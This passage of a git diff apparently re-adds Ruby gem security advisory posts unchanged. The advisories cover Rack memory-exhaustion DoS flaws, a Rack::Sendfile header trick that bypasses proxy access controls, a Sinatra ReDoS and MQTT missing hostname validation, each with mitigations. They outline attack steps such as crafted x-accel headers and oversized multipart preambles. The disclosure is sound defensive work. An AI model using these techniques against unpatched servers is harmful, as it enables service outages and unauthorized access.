-    data into a shared buffer (`@sbuf.concat(content)`) and scans for
-    the boundary pattern:
-
-    ```ruby
-    @sbuf.scan_until(@body_regex)
-    ```
-
-    If the boundary is not yet found, the parser continues buffering
-    data indefinitely. There is no trimming or size cap on the preamble,
-    allowing attackers to send arbitrary amounts of data before the
-    first boundary.
-
-    ## Impact
-
-    Remote attackers can trigger large transient memory spikes by
-    including a long preamble in multipart/form-data requests. The
-    impact scales with allowed request sizes and concurrency, potentially
-    causing worker crashes or severe slowdown due to garbage collection.
-
-    ## Mitigation
-
-    * **Upgrade:** Use a patched version of Rack that enforces a preamble
-    size limit (e.g., 16 KiB) or discards preamble data entirely per
-    [RFC 2046 § 5.1.1](https://www.rfc-editor.org/rfc/rfc2046.html#section-5.1.1).
-
-    * **Workarounds:**
-      * Limit total request body size at the proxy or web server level.
-      * Monitor memory and set per-process limits to prevent OOM conditions.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 2.2.19"
-  - "~> 3.1.17"
-  - ">= 3.2.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-61770
-    - https://github.com/rack/rack/security/advisories/GHSA-p543-xpfm-54cp
-    - https://github.com/rack/rack/commit/589127f4ac8b5cf11cf88fb0cd116ffed4d2181e
-    - https://github.com/rack/rack/commit/d869fed663b113b95a74ad53e1b5cae6ab31f29e
-    - https://github.com/rack/rack/commit/e08f78c656c9394d6737c022bde087e0f33336fd
-    - https://github.com/advisories/GHSA-p543-xpfm-54cp
----
+---
+layout: advisory
+title: 'CVE-2025-61770 (rack): Rack''s unbounded multipart preamble buffering enables
+  DoS (memory exhaustion)'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2025-61770
+  ghsa: p543-xpfm-54cp
+  url: https://github.com/rack/rack/security/advisories/GHSA-p543-xpfm-54cp
+  title: Rack's unbounded multipart preamble buffering enables DoS (memory exhaustion)
+  date: 2025-10-07
+  description: |
+    ## Summary
+
+    `Rack::Multipart::Parser` buffers the entire multipart **preamble**
+    (bytes before the first boundary) in memory without any size limit.
+    A client can send a large preamble followed by a valid boundary,
+    causing significant memory use and potential process termination
+    due to out-of-memory (OOM) conditions.
+
+    ## Details
+
+    While searching for the first boundary, the parser appends incoming
+    data into a shared buffer (`@sbuf.concat(content)`) and scans for
+    the boundary pattern:
+
+    ```ruby
+    @sbuf.scan_until(@body_regex)
+    ```
+
+    If the boundary is not yet found, the parser continues buffering
+    data indefinitely. There is no trimming or size cap on the preamble,
+    allowing attackers to send arbitrary amounts of data before the
+    first boundary.
+
+    ## Impact
+
+    Remote attackers can trigger large transient memory spikes by
+    including a long preamble in multipart/form-data requests. The
+    impact scales with allowed request sizes and concurrency, potentially
+    causing worker crashes or severe slowdown due to garbage collection.
+
+    ## Mitigation
+
+    * **Upgrade:** Use a patched version of Rack that enforces a preamble
+    size limit (e.g., 16 KiB) or discards preamble data entirely per
+    [RFC 2046 § 5.1.1](https://www.rfc-editor.org/rfc/rfc2046.html#section-5.1.1).
+
+    * **Workarounds:**
+      * Limit total request body size at the proxy or web server level.
+      * Monitor memory and set per-process limits to prevent OOM conditions.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 2.2.19"
+  - "~> 3.1.17"
+  - ">= 3.2.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-61770
+    - https://github.com/rack/rack/security/advisories/GHSA-p543-xpfm-54cp
+    - https://github.com/rack/rack/commit/589127f4ac8b5cf11cf88fb0cd116ffed4d2181e
+    - https://github.com/rack/rack/commit/d869fed663b113b95a74ad53e1b5cae6ab31f29e
+    - https://github.com/rack/rack/commit/e08f78c656c9394d6737c022bde087e0f33336fd
+    - https://github.com/advisories/GHSA-p543-xpfm-54cp
+---
diff --git a/advisories/_posts/2025-10-07-CVE-2025-61771.md b/advisories/_posts/2025-10-07-CVE-2025-61771.md
index d54bc402..931e1209 100644
--- a/advisories/_posts/2025-10-07-CVE-2025-61771.md
+++ b/advisories/_posts/2025-10-07-CVE-2025-61771.md
@@ -1,68 +1,68 @@
----
-layout: advisory
-title: 'CVE-2025-61771 (rack): Multipart parser buffers large non‑file fields entirely
-  in memory, enabling DoS (memory exhaustion)'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2025-61771
-  ghsa: w9pc-fmgc-vxvw
-  url: https://github.com/rack/rack/security/advisories/GHSA-w9pc-fmgc-vxvw
-  title: Multipart parser buffers large non‑file fields entirely in memory, enabling
-    DoS (memory exhaustion)
-  date: 2025-10-07
-  description: |
-    ## Summary
-
-    `Rack::Multipart::Parser` stores non-file form fields (parts without
-    a `filename`) entirely in memory as Ruby `String` objects. A single
-    large text field in a multipart/form-data request (hundreds of
-    megabytes or more) can consume equivalent process memory, potentially
-    leading to out-of-memory (OOM) conditions and denial of service (DoS).
-
-    ## Details
-
-    During multipart parsing, file parts are streamed to temporary files,
-    but non-file parts are buffered into memory:
-
-    ```ruby
-    body = String.new  # non-file → in-RAM buffer
-    @mime_parts[mime_index].body << content
-    ```
-
-    There is no size limit on these in-memory buffers. As a result, any
-    large text field—while technically valid—will be loaded fully into
-    process memory before being added to `params`.
-
-    ## Impact
-
-    Attackers can send large non-file fields to trigger excessive memory
-    usage. Impact scales with request size and concurrency, potentially
-    leading to worker crashes or severe garbage-collection overhead. All
-    Rack applications processing multipart form submissions are affected.
-
-    ## Mitigation
-
-    * **Upgrade:** Use a patched version of Rack that enforces a
-      reasonable size cap for non-file fields (e.g., 2 MiB).
-
-    * **Workarounds:**
-      * Restrict maximum request body size at the web-server or proxy
-        layer (e.g., Nginx `client_max_body_size`).
-      * Validate and reject unusually large form fields at the application level.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 2.2.19"
-  - "~> 3.1.17"
-  - ">= 3.2.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-61771
-    - https://github.com/rack/rack/security/advisories/GHSA-w9pc-fmgc-vxvw
-    - https://github.com/rack/rack/commit/589127f4ac8b5cf11cf88fb0cd116ffed4d2181e
-    - https://github.com/rack/rack/commit/d869fed663b113b95a74ad53e1b5cae6ab31f29e
-    - https://github.com/rack/rack/commit/e08f78c656c9394d6737c022bde087e0f33336fd
-    - https://github.com/advisories/GHSA-w9pc-fmgc-vxvw
----
+---
+layout: advisory
+title: 'CVE-2025-61771 (rack): Multipart parser buffers large non‑file fields entirely
+  in memory, enabling DoS (memory exhaustion)'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2025-61771
+  ghsa: w9pc-fmgc-vxvw
+  url: https://github.com/rack/rack/security/advisories/GHSA-w9pc-fmgc-vxvw
+  title: Multipart parser buffers large non‑file fields entirely in memory, enabling
+    DoS (memory exhaustion)
+  date: 2025-10-07
+  description: |
+    ## Summary
+
+    `Rack::Multipart::Parser` stores non-file form fields (parts without
+    a `filename`) entirely in memory as Ruby `String` objects. A single
+    large text field in a multipart/form-data request (hundreds of
+    megabytes or more) can consume equivalent process memory, potentially
+    leading to out-of-memory (OOM) conditions and denial of service (DoS).
+
+    ## Details
+
+    During multipart parsing, file parts are streamed to temporary files,
+    but non-file parts are buffered into memory:
+
+    ```ruby
+    body = String.new  # non-file → in-RAM buffer
+    @mime_parts[mime_index].body << content
+    ```
+
+    There is no size limit on these in-memory buffers. As a result, any
+    large text field—while technically valid—will be loaded fully into
+    process memory before being added to `params`.
+
+    ## Impact
+
+    Attackers can send large non-file fields to trigger excessive memory
+    usage. Impact scales with request size and concurrency, potentially
+    leading to worker crashes or severe garbage-collection overhead. All
+    Rack applications processing multipart form submissions are affected.
+
+    ## Mitigation
+
+    * **Upgrade:** Use a patched version of Rack that enforces a
+      reasonable size cap for non-file fields (e.g., 2 MiB).
+
+    * **Workarounds:**
+      * Restrict maximum request body size at the web-server or proxy
+        layer (e.g., Nginx `client_max_body_size`).
+      * Validate and reject unusually large form fields at the application level.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 2.2.19"
+  - "~> 3.1.17"
+  - ">= 3.2.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-61771
+    - https://github.com/rack/rack/security/advisories/GHSA-w9pc-fmgc-vxvw
+    - https://github.com/rack/rack/commit/589127f4ac8b5cf11cf88fb0cd116ffed4d2181e
+    - https://github.com/rack/rack/commit/d869fed663b113b95a74ad53e1b5cae6ab31f29e
+    - https://github.com/rack/rack/commit/e08f78c656c9394d6737c022bde087e0f33336fd
+    - https://github.com/advisories/GHSA-w9pc-fmgc-vxvw
+---
diff --git a/advisories/_posts/2025-10-07-CVE-2025-61772.md b/advisories/_posts/2025-10-07-CVE-2025-61772.md
index a4995858..883a6c53 100644
--- a/advisories/_posts/2025-10-07-CVE-2025-61772.md
+++ b/advisories/_posts/2025-10-07-CVE-2025-61772.md
@@ -1,67 +1,67 @@
----
-layout: advisory
-title: 'CVE-2025-61772 (rack): Rack''s multipart parser buffers unbounded per-part
-  headers, enabling DoS (memory exhaustion)'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2025-61772
-  ghsa: wpv5-97wm-hp9c
-  url: https://github.com/rack/rack/security/advisories/GHSA-wpv5-97wm-hp9c
-  title: Rack's multipart parser buffers unbounded per-part headers, enabling DoS
-    (memory exhaustion)
-  date: 2025-10-07
-  description: |
-    ## Summary
-
-    `Rack::Multipart::Parser` can accumulate unbounded data when a
-    multipart part’s header block never terminates with the required
-    blank line (`CRLFCRLF`). The parser keeps appending incoming bytes
-    to memory without a size cap, allowing a remote attacker to exhaust
-    memory and cause a denial of service (DoS).
-
-    ## Details
-
-    While reading multipart headers, the parser waits for `CRLFCRLF` using:
-
-    ```ruby
-    @sbuf.scan_until(/(.*?\r
-    )\r
-    /m)
-    ```
-
-    If the terminator never appears, it continues appending data
-    (`@sbuf.concat(content)`) indefinitely. There is no limit on
-    accumulated header bytes, so a single malformed part can consume
-    memory proportional to the request body size.
-
-    ## Impact
-
-    Attackers can send incomplete multipart headers to trigger high memory
-    use, leading to process termination (OOM) or severe slowdown. The
-    effect scales with request size limits and concurrency. All
-    applications handling multipart uploads may be affected.
-
-    ## Mitigation
-
-    * Upgrade to a patched Rack version that caps per-part header size
-      (e.g., 64 KiB).
-
-    * Until then, restrict maximum request sizes at the proxy or web
-      server layer (e.g., Nginx `client_max_body_size`).
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 2.2.19"
-  - "~> 3.1.17"
-  - ">= 3.2.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-61772
-    - https://github.com/rack/rack/security/advisories/GHSA-wpv5-97wm-hp9c
-    - https://github.com/rack/rack/commit/589127f4ac8b5cf11cf88fb0cd116ffed4d2181e
-    - https://github.com/rack/rack/commit/d869fed663b113b95a74ad53e1b5cae6ab31f29e
-    - https://github.com/rack/rack/commit/e08f78c656c9394d6737c022bde087e0f33336fd
-    - https://github.com/advisories/GHSA-wpv5-97wm-hp9c
----
+---
+layout: advisory
+title: 'CVE-2025-61772 (rack): Rack''s multipart parser buffers unbounded per-part
+  headers, enabling DoS (memory exhaustion)'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2025-61772
+  ghsa: wpv5-97wm-hp9c
+  url: https://github.com/rack/rack/security/advisories/GHSA-wpv5-97wm-hp9c
+  title: Rack's multipart parser buffers unbounded per-part headers, enabling DoS
+    (memory exhaustion)
+  date: 2025-10-07
+  description: |
+    ## Summary
+
+    `Rack::Multipart::Parser` can accumulate unbounded data when a
+    multipart part’s header block never terminates with the required
+    blank line (`CRLFCRLF`). The parser keeps appending incoming bytes
+    to memory without a size cap, allowing a remote attacker to exhaust
+    memory and cause a denial of service (DoS).
+
+    ## Details
+
+    While reading multipart headers, the parser waits for `CRLFCRLF` using:
+
+    ```ruby
+    @sbuf.scan_until(/(.*?\r
+    )\r
+    /m)
+    ```
+
+    If the terminator never appears, it continues appending data
+    (`@sbuf.concat(content)`) indefinitely. There is no limit on
+    accumulated header bytes, so a single malformed part can consume
+    memory proportional to the request body size.
+
+    ## Impact
+
+    Attackers can send incomplete multipart headers to trigger high memory
+    use, leading to process termination (OOM) or severe slowdown. The
+    effect scales with request size limits and concurrency. All
+    applications handling multipart uploads may be affected.
+
+    ## Mitigation
+
+    * Upgrade to a patched Rack version that caps per-part header size
+      (e.g., 64 KiB).
+
+    * Until then, restrict maximum request sizes at the proxy or web
+      server layer (e.g., Nginx `client_max_body_size`).
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 2.2.19"
+  - "~> 3.1.17"
+  - ">= 3.2.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-61772
+    - https://github.com/rack/rack/security/advisories/GHSA-wpv5-97wm-hp9c
+    - https://github.com/rack/rack/commit/589127f4ac8b5cf11cf88fb0cd116ffed4d2181e
+    - https://github.com/rack/rack/commit/d869fed663b113b95a74ad53e1b5cae6ab31f29e
+    - https://github.com/rack/rack/commit/e08f78c656c9394d6737c022bde087e0f33336fd
+    - https://github.com/advisories/GHSA-wpv5-97wm-hp9c
+---
diff --git a/advisories/_posts/2025-10-10-CVE-2025-61780.md b/advisories/_posts/2025-10-10-CVE-2025-61780.md
index febac7b9..49f066c5 100644
--- a/advisories/_posts/2025-10-10-CVE-2025-61780.md
+++ b/advisories/_posts/2025-10-10-CVE-2025-61780.md
@@ -1,88 +1,88 @@
----
-layout: advisory
-title: 'CVE-2025-61780 (rack): Rack has a Possible Information Disclosure Vulnerability'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2025-61780
-  ghsa: r657-rxjc-j557
-  url: https://github.com/rack/rack/security/advisories/GHSA-r657-rxjc-j557
-  title: Rack has a Possible Information Disclosure Vulnerability
-  date: 2025-10-10
-  description: |
-    ## Summary
-
-    A possible information disclosure vulnerability existed in
-    `Rack::Sendfile` when running behind a proxy that supports
-    `x-sendfile` headers (such as Nginx). Specially crafted headers
-    could cause `Rack::Sendfile` to miscommunicate with the proxy and
-    trigger unintended internal requests, potentially bypassing
-    proxy-level access restrictions.
-
-    ## Details
-
-    When `Rack::Sendfile` received untrusted `x-sendfile-type` or
-    `x-accel-mapping` headers from a client, it would interpret them
-    as proxy configuration directives. This could cause the middleware
-    to send a "redirect" response to the proxy, prompting it to reissue
-    a new internal request that was
-    **not subject to the proxy's access controls**.
-
-    An attacker could exploit this by:
-    1. Setting a crafted `x-sendfile-type: x-accel-redirect` header.
-    2. Setting a crafted `x-accel-mapping` header.
-    3. Requesting a path that qualifies for proxy-based acceleration.
-
-    ## Impact
-
-    Attackers could bypass proxy-enforced restrictions and access internal
-    endpoints intended to be protected (such as administrative pages).
-    The vulnerability did not allow arbitrary file reads but could
-    expose sensitive application routes.
-
-    This issue only affected systems meeting all of the following conditions:
-
-    * The application used `Rack::Sendfile` with a proxy that supports
-      `x-accel-redirect` (e.g., Nginx).
-    * The proxy did **not** always set or remove the `x-sendfile-type`
-      and `x-accel-mapping` headers.
-    * The application exposed an endpoint that returned a body
-      responding to `.to_path`.
-
-    ## Mitigation
-
-    * Upgrade to a fixed version of Rack which requires explicit
-      configuration to enable `x-accel-redirect`:
-
-      ```ruby
-      use Rack::Sendfile, "x-accel-redirect"
-      ```
-
-    * Alternatively, configure the proxy to always set or strip
-      the headers (you should be doing this!):
-
-      ```nginx
-      proxy_set_header x-sendfile-type x-accel-redirect;
-      proxy_set_header x-accel-mapping /var/www/=/files/;
-      ```
-
-    * Or in Rails applications, disable sendfile completely:
-
-      ```ruby
-      config.action_dispatch.x_sendfile_header = nil
-      ```
-  cvss_v3: 5.8
-  patched_versions:
-  - "~> 2.2.20"
-  - "~> 3.1.18"
-  - ">= 3.2.3"
-  related:
-    url:
-    - https://github.com/rack/rack/security/advisories/GHSA-r657-rxjc-j557
-    - https://github.com/rack/rack/commit/57277b7741581fa827472c5c666f6e6a33abd784
-    - https://github.com/rack/rack/commit/7e69f65eefe9cd2868df9f9f3b0977b86f93523a
-    - https://github.com/rack/rack/commit/fba2c8bc63eb787ff4b19bc612d315fda6126d85
-    - https://github.com/advisories/GHSA-r657-rxjc-j557
----
+---
+layout: advisory
+title: 'CVE-2025-61780 (rack): Rack has a Possible Information Disclosure Vulnerability'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2025-61780
+  ghsa: r657-rxjc-j557
+  url: https://github.com/rack/rack/security/advisories/GHSA-r657-rxjc-j557
+  title: Rack has a Possible Information Disclosure Vulnerability
+  date: 2025-10-10
+  description: |
+    ## Summary
+
+    A possible information disclosure vulnerability existed in
+    `Rack::Sendfile` when running behind a proxy that supports
+    `x-sendfile` headers (such as Nginx). Specially crafted headers
+    could cause `Rack::Sendfile` to miscommunicate with the proxy and
+    trigger unintended internal requests, potentially bypassing
+    proxy-level access restrictions.
+
+    ## Details
+
+    When `Rack::Sendfile` received untrusted `x-sendfile-type` or
+    `x-accel-mapping` headers from a client, it would interpret them
+    as proxy configuration directives. This could cause the middleware
+    to send a "redirect" response to the proxy, prompting it to reissue
+    a new internal request that was
+    **not subject to the proxy's access controls**.
+
+    An attacker could exploit this by:
+    1. Setting a crafted `x-sendfile-type: x-accel-redirect` header.
+    2. Setting a crafted `x-accel-mapping` header.
+    3. Requesting a path that qualifies for proxy-based acceleration.
+
+    ## Impact
+
+    Attackers could bypass proxy-enforced restrictions and access internal
+    endpoints intended to be protected (such as administrative pages).
+    The vulnerability did not allow arbitrary file reads but could
+    expose sensitive application routes.
+
+    This issue only affected systems meeting all of the following conditions:
+
+    * The application used `Rack::Sendfile` with a proxy that supports
+      `x-accel-redirect` (e.g., Nginx).
+    * The proxy did **not** always set or remove the `x-sendfile-type`
+      and `x-accel-mapping` headers.
+    * The application exposed an endpoint that returned a body
+      responding to `.to_path`.
+
+    ## Mitigation
+
+    * Upgrade to a fixed version of Rack which requires explicit
+      configuration to enable `x-accel-redirect`:
+
+      ```ruby
+      use Rack::Sendfile, "x-accel-redirect"
+      ```
+
+    * Alternatively, configure the proxy to always set or strip
+      the headers (you should be doing this!):
+
+      ```nginx
+      proxy_set_header x-sendfile-type x-accel-redirect;
+      proxy_set_header x-accel-mapping /var/www/=/files/;
+      ```
+
+    * Or in Rails applications, disable sendfile completely:
+
+      ```ruby
+      config.action_dispatch.x_sendfile_header = nil
+      ```
+  cvss_v3: 5.8
+  patched_versions:
+  - "~> 2.2.20"
+  - "~> 3.1.18"
+  - ">= 3.2.3"
+  related:
+    url:
+    - https://github.com/rack/rack/security/advisories/GHSA-r657-rxjc-j557
+    - https://github.com/rack/rack/commit/57277b7741581fa827472c5c666f6e6a33abd784
+    - https://github.com/rack/rack/commit/7e69f65eefe9cd2868df9f9f3b0977b86f93523a
+    - https://github.com/rack/rack/commit/fba2c8bc63eb787ff4b19bc612d315fda6126d85
+    - https://github.com/advisories/GHSA-r657-rxjc-j557
+---
diff --git a/advisories/_posts/2025-10-10-CVE-2025-61919.md b/advisories/_posts/2025-10-10-CVE-2025-61919.md
index 6d668281..a36332a9 100644
--- a/advisories/_posts/2025-10-10-CVE-2025-61919.md
+++ b/advisories/_posts/2025-10-10-CVE-2025-61919.md
@@ -1,68 +1,68 @@
----
-layout: advisory
-title: 'CVE-2025-61919 (rack): Rack is vulnerable to a memory-exhaustion DoS through
-  unbounded URL-encoded body parsing'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2025-61919
-  ghsa: 6xw4-3v39-52mm
-  url: https://github.com/rack/rack/security/advisories/GHSA-6xw4-3v39-52mm
-  title: Rack is vulnerable to a memory-exhaustion DoS through unbounded URL-encoded
-    body parsing
-  date: 2025-10-10
-  description: |
-    ## Summary
-
-    `Rack::Request#POST` reads the entire request body into memory for
-    `Content-Type: application/x-www-form-urlencoded`, calling
-    `rack.input.read(nil)` without enforcing a length or cap. Large
-    request bodies can therefore be buffered completely into process
-    memory before parsing, leading to denial of service (DoS) through
-    memory exhaustion.
-
-    ## Details
-
-    When handling non-multipart form submissions, Rack’s request
-    parser performs:
-
-    ```ruby
-    form_vars = get_header(RACK_INPUT).read
-    ```
-
-    Since `read` is called with no argument, the entire request body is
-    loaded into a Ruby `String`. This occurs before query parameter
-    parsing or enforcement of any `params_limit`. As a result, Rack
-    applications without an upstream body-size limit can experience
-    unbounded memory allocation proportional to request size.
-
-    ## Impact
-
-    Attackers can send large `application/x-www-form-urlencoded` bodies
-    to consume process memory, causing slowdowns or termination by the
-    operating system (OOM). The effect scales linearly with request
-    size and concurrency. Even with parsing limits configured, the
-    issue occurs *before* those limits are enforced.
-
-    ## Mitigation
-
-    * Update to a patched version of Rack that enforces form parameter
-      limits using `query_parser.bytesize_limit`, preventing unbounded
-      reads of `application/x-www-form-urlencoded` bodies.
-    * Enforce strict maximum body size at the proxy or web server layer
-      (e.g., Nginx `client_max_body_size`, Apache `LimitRequestBody`).
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 2.2.20"
-  - "~> 3.1.18"
-  - ">= 3.2.3"
-  related:
-    url:
-    - https://github.com/rack/rack/security/advisories/GHSA-6xw4-3v39-52mm
-    - https://github.com/rack/rack/commit/4e2c903991a790ee211a3021808ff4fd6fe82881
-    - https://github.com/rack/rack/commit/cbd541e8a3d0c5830a3c9a30d3718ce2e124f9db
-    - https://github.com/rack/rack/commit/e179614c4a653283286f5f046428cbb85f21146f
-    - https://github.com/advisories/GHSA-6xw4-3v39-52mm
----
+---
+layout: advisory
+title: 'CVE-2025-61919 (rack): Rack is vulnerable to a memory-exhaustion DoS through
+  unbounded URL-encoded body parsing'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2025-61919
+  ghsa: 6xw4-3v39-52mm
+  url: https://github.com/rack/rack/security/advisories/GHSA-6xw4-3v39-52mm
+  title: Rack is vulnerable to a memory-exhaustion DoS through unbounded URL-encoded
+    body parsing
+  date: 2025-10-10
+  description: |
+    ## Summary
+
+    `Rack::Request#POST` reads the entire request body into memory for
+    `Content-Type: application/x-www-form-urlencoded`, calling
+    `rack.input.read(nil)` without enforcing a length or cap. Large
+    request bodies can therefore be buffered completely into process
+    memory before parsing, leading to denial of service (DoS) through
+    memory exhaustion.
+
+    ## Details
+
+    When handling non-multipart form submissions, Rack’s request
+    parser performs:
+
+    ```ruby
+    form_vars = get_header(RACK_INPUT).read
+    ```
+
+    Since `read` is called with no argument, the entire request body is
+    loaded into a Ruby `String`. This occurs before query parameter
+    parsing or enforcement of any `params_limit`. As a result, Rack
+    applications without an upstream body-size limit can experience
+    unbounded memory allocation proportional to request size.
+
+    ## Impact
+
+    Attackers can send large `application/x-www-form-urlencoded` bodies
+    to consume process memory, causing slowdowns or termination by the
+    operating system (OOM). The effect scales linearly with request
+    size and concurrency. Even with parsing limits configured, the
+    issue occurs *before* those limits are enforced.
+
+    ## Mitigation
+
+    * Update to a patched version of Rack that enforces form parameter
+      limits using `query_parser.bytesize_limit`, preventing unbounded
+      reads of `application/x-www-form-urlencoded` bodies.
+    * Enforce strict maximum body size at the proxy or web server layer
+      (e.g., Nginx `client_max_body_size`, Apache `LimitRequestBody`).
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 2.2.20"
+  - "~> 3.1.18"
+  - ">= 3.2.3"
+  related:
+    url:
+    - https://github.com/rack/rack/security/advisories/GHSA-6xw4-3v39-52mm
+    - https://github.com/rack/rack/commit/4e2c903991a790ee211a3021808ff4fd6fe82881
+    - https://github.com/rack/rack/commit/cbd541e8a3d0c5830a3c9a30d3718ce2e124f9db
+    - https://github.com/rack/rack/commit/e179614c4a653283286f5f046428cbb85f21146f
+    - https://github.com/advisories/GHSA-6xw4-3v39-52mm
+---
diff --git a/advisories/_posts/2025-10-10-CVE-2025-61921.md b/advisories/_posts/2025-10-10-CVE-2025-61921.md
index f8c74354..eef1d912 100644
--- a/advisories/_posts/2025-10-10-CVE-2025-61921.md
+++ b/advisories/_posts/2025-10-10-CVE-2025-61921.md
@@ -1,49 +1,49 @@
----
-layout: advisory
-title: 'CVE-2025-61921 (sinatra): Sinatra is vulnerable to ReDoS through ETag header
-  value generation'
-comments: false
-categories:
-- sinatra
-advisory:
-  gem: sinatra
-  cve: 2025-61921
-  ghsa: mr3q-g2mv-mr4q
-  url: https://github.com/sinatra/sinatra/security/advisories/GHSA-mr3q-g2mv-mr4q
-  title: Sinatra is vulnerable to ReDoS through ETag header value generation
-  date: 2025-10-10
-  description: |
-    ### Summary
-
-    There is a denial of service vulnerability in the `If-Match` and
-    `If-None-Match` header parsing component of Sinatra, if the `etag`
-    method is used when constructing the response and you are using Ruby < 3.2.
-
-    ### Details
-
-    Carefully crafted input can cause `If-Match` and `If-None-Match`
-    header parsing in Sinatra to take an unexpected amount of time,
-    possibly resulting in a denial of service attack vector. This header
-    is typically involved in generating the `ETag` header value. Any
-    applications that use the `etag` method when generating a response
-    are impacted if they are using Ruby below version 3.2.
-
-    ### Resources
-
-    * https://github.com/sinatra/sinatra/issues/2120 (report)
-    * https://github.com/sinatra/sinatra/pull/2121 (fix)
-    * https://github.com/sinatra/sinatra/pull/1823 (older ReDoS vulnerability)
-    * https://bugs.ruby-lang.org/issues/19104 (fix in Ruby >= 3.2)
-  patched_versions:
-  - ">= 4.2.0"
-  related:
-    url:
-    - https://github.com/sinatra/sinatra/security/advisories/GHSA-mr3q-g2mv-mr4q
-    - https://github.com/sinatra/sinatra/issues/2120
-    - https://github.com/sinatra/sinatra/pull/1823
-    - https://github.com/sinatra/sinatra/pull/2121
-    - https://github.com/sinatra/sinatra/commit/3fe8c38dc405586f7ad8f2ac748aa53e9c3615bd
-    - https://github.com/sinatra/sinatra/commit/8ff496bd4877520599e1479d6efead39304edceb
-    - https://bugs.ruby-lang.org/issues/19104
-    - https://github.com/advisories/GHSA-mr3q-g2mv-mr4q
----
+---
+layout: advisory
+title: 'CVE-2025-61921 (sinatra): Sinatra is vulnerable to ReDoS through ETag header
+  value generation'
+comments: false
+categories:
+- sinatra
+advisory:
+  gem: sinatra
+  cve: 2025-61921
+  ghsa: mr3q-g2mv-mr4q
+  url: https://github.com/sinatra/sinatra/security/advisories/GHSA-mr3q-g2mv-mr4q
+  title: Sinatra is vulnerable to ReDoS through ETag header value generation
+  date: 2025-10-10
+  description: |
+    ### Summary
+
+    There is a denial of service vulnerability in the `If-Match` and
+    `If-None-Match` header parsing component of Sinatra, if the `etag`
+    method is used when constructing the response and you are using Ruby < 3.2.
+
+    ### Details
+
+    Carefully crafted input can cause `If-Match` and `If-None-Match`
+    header parsing in Sinatra to take an unexpected amount of time,
+    possibly resulting in a denial of service attack vector. This header
+    is typically involved in generating the `ETag` header value. Any
+    applications that use the `etag` method when generating a response
+    are impacted if they are using Ruby below version 3.2.
+
+    ### Resources
+
+    * https://github.com/sinatra/sinatra/issues/2120 (report)
+    * https://github.com/sinatra/sinatra/pull/2121 (fix)
+    * https://github.com/sinatra/sinatra/pull/1823 (older ReDoS vulnerability)
+    * https://bugs.ruby-lang.org/issues/19104 (fix in Ruby >= 3.2)
+  patched_versions:
+  - ">= 4.2.0"
+  related:
+    url:
+    - https://github.com/sinatra/sinatra/security/advisories/GHSA-mr3q-g2mv-mr4q
+    - https://github.com/sinatra/sinatra/issues/2120
+    - https://github.com/sinatra/sinatra/pull/1823
+    - https://github.com/sinatra/sinatra/pull/2121
+    - https://github.com/sinatra/sinatra/commit/3fe8c38dc405586f7ad8f2ac748aa53e9c3615bd
+    - https://github.com/sinatra/sinatra/commit/8ff496bd4877520599e1479d6efead39304edceb
+    - https://bugs.ruby-lang.org/issues/19104
+    - https://github.com/advisories/GHSA-mr3q-g2mv-mr4q
+---
diff --git a/advisories/_posts/2025-11-06-CVE-2025-12790.md b/advisories/_posts/2025-11-06-CVE-2025-12790.md
index cea680ee..c4e97349 100644
--- a/advisories/_posts/2025-11-06-CVE-2025-12790.md
+++ b/advisories/_posts/2025-11-06-CVE-2025-12790.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2025-12790 (mqtt): MQTT does not validate hostnames'
-comments: false
-categories:
-- mqtt
-advisory:
-  gem: mqtt
-  cve: 2025-12790
-  ghsa: 9c5q-w6gr-fxcq
-  url: https://access.redhat.com/security/cve/CVE-2025-12790
-  title: MQTT does not validate hostnames
-  date: 2025-11-06
-  description: |
-    A flaw was found in Rubygem MQTT. By default, the package used to
-    not have hostname validation, resulting in possible
-    Man-in-the-Middle (MITM) attack.
-  cvss_v3: 7.4
-  patched_versions:
-  - ">= 0.7.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-12790
-    - https://github.com/njh/ruby-mqtt/releases/tag/v0.7.0
-    - https://github.com/njh/ruby-mqtt/blob/main/NEWS.md#ruby-mqtt-version-070-2025-10-29
-    - https://access.redhat.com/security/cve/CVE-2025-12790
-    - https://bugzilla.redhat.com/show_bug.cgi?id=2413004
-    - https://github.com/advisories/GHSA-9c5q-w6gr-fxcq
----
+---
+layout: advisory
+title: 'CVE-2025-12790 (mqtt): MQTT does not validate hostnames'
+comments: false
+categories:
+- mqtt
+advisory:
+  gem: mqtt
+  cve: 2025-12790
+  ghsa: 9c5q-w6gr-fxcq
+  url: https://access.redhat.com/security/cve/CVE-2025-12790
+  title: MQTT does not validate hostnames
+  date: 2025-11-06
+  description: |
+    A flaw was found in Rubygem MQTT. By default, the package used to
+    not have hostname validation, resulting in possible
+    Man-in-the-Middle (MITM) attack.
+  cvss_v3: 7.4
+  patched_versions:
+  - ">= 0.7.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-12790
+    - https://github.com/njh/ruby-mqtt/releases/tag/v0.7.0
